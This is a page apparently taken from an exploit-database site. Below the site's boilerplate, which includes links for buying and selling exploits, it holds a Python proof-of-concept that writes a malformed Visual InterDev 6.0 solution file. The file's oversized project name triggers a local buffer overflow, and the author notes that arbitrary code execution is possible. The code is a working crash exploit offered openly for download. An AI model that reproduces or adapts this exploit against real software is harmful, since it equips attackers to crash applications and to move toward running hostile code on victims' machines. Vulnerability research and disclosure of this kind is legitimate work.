0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC
====================================================================== Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC ====================================================================== #usage: exploit.py FileName import sys print "--------------------------------------------------------------------------------" print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow' print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org\n" print " Execution of arbitrary code is possible, but it annoys me at the moment :)" print "--------------------------------------------------------------------------------" buff = "a" * 264 + "bbbb" + "c" * 256 try: sln_file = \ 'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\ 'Project("{}") = "' + buff + '"\n'+\ 'EndProject\n' out_file = open(sys.argv[1] + ".sln",'w') out_file.write(sln_file) out_file.close() print "\nFILE CREATION COMPLETED!\n" except: print " \n -------------------------------------" print " Usage: exploit.py FileName" print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!" # 0day.today [2024-11-15] #